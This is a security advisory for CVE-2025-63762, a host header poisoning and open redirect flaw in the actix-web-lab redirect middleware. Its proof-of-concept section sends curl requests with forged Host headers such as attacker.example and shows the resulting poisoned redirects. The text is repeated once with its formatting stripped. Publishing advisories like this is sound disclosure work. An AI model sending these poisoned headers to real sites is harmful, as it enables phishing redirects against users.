Summary
actix-web-lab redirect middleware uses request-derived host information to construct absolute redirect URLs (for example, https://{hostname}{path}). In deployments without strict host allowlisting, an attacker can supply a malicious Host header and poison the Location response header, causing open redirect/phishing behavior.
CVE
Assigned CVE ID: CVE-2025-63762
Details
The issue is in redirect middleware paths that construct absolute URLs from req.connection_info():
-
actix-web-lab/src/redirect_to_https.rs (around lines 119-132)
let host = conn_info.host();format!("https://{hostname}{path}")format!("https://{hostname}:{port}{path}")
-
actix-web-lab/src/redirect_to_www.rs (around lines 30-35)
format!("{scheme}://www.{host}{path}")
-
actix-web-lab/src/redirect_to_non_www.rs (around lines 30-34)
format!("{scheme}://{host_no_www}{path}")
Because host values come from request connection metadata, untrusted Host input can influence redirect targets when deployment-side host validation is missing.
PoC
Environment used for validation:
- Local minimal Actix apps using
actix-web-lab middleware
- RedirectHttps:
http://127.0.0.1:18080
- redirect_to_www:
http://127.0.0.1:18081
- redirect_to_non_www:
http://127.0.0.1:18082
Reproduction (RedirectHttps):
curl.exe -i -s "http://127.0.0.1:18080/test" -H "Host: attacker.example"
Observed response:
HTTP/1.1 307 Temporary Redirect
location: https://attacker.example/test
Additional verification:
curl.exe -i -s "http://127.0.0.1:18080/abc/def" -H "Host: evil.example:9999"
Observed response:
HTTP/1.1 307 Temporary Redirect
location: https://evil.example/abc/def
Reproduction (redirect_to_www):
curl.exe -i -s "http://127.0.0.1:18081/hello" -H "Host: attacker.example"
Observed response:
HTTP/1.1 307 Temporary Redirect
location: http://www.attacker.example/hello
Reproduction (redirect_to_non_www):
curl.exe -i -s "http://127.0.0.1:18082/path" -H "Host: www.attacker.example"
Observed response:
HTTP/1.1 307 Temporary Redirect
location: http://attacker.example/path
Impact
This is a Host header poisoning / open redirect issue. Users can be redirected to attacker-controlled domains, enabling phishing and trust-boundary abuse. Any application using these middleware paths without strict host validation (proxy/app allowlisting) is impacted.
References
Summary
actix-web-labredirect middleware uses request-derived host information to construct absolute redirect URLs (for example,https://{hostname}{path}). In deployments without strict host allowlisting, an attacker can supply a malicious Host header and poison theLocationresponse header, causing open redirect/phishing behavior.CVE
Assigned CVE ID: CVE-2025-63762
Details
The issue is in redirect middleware paths that construct absolute URLs from
req.connection_info():actix-web-lab/src/redirect_to_https.rs(around lines 119-132)let host = conn_info.host();format!("https://{hostname}{path}")format!("https://{hostname}:{port}{path}")actix-web-lab/src/redirect_to_www.rs(around lines 30-35)format!("{scheme}://www.{host}{path}")actix-web-lab/src/redirect_to_non_www.rs(around lines 30-34)format!("{scheme}://{host_no_www}{path}")Because host values come from request connection metadata, untrusted Host input can influence redirect targets when deployment-side host validation is missing.
PoC
Environment used for validation:
actix-web-labmiddlewarehttp://127.0.0.1:18080http://127.0.0.1:18081http://127.0.0.1:18082Reproduction (RedirectHttps):
Observed response:
Additional verification:
Observed response:
Reproduction (redirect_to_www):
Observed response:
Reproduction (redirect_to_non_www):
Observed response:
Impact
This is a Host header poisoning / open redirect issue. Users can be redirected to attacker-controlled domains, enabling phishing and trust-boundary abuse. Any application using these middleware paths without strict host validation (proxy/app allowlisting) is impacted.
References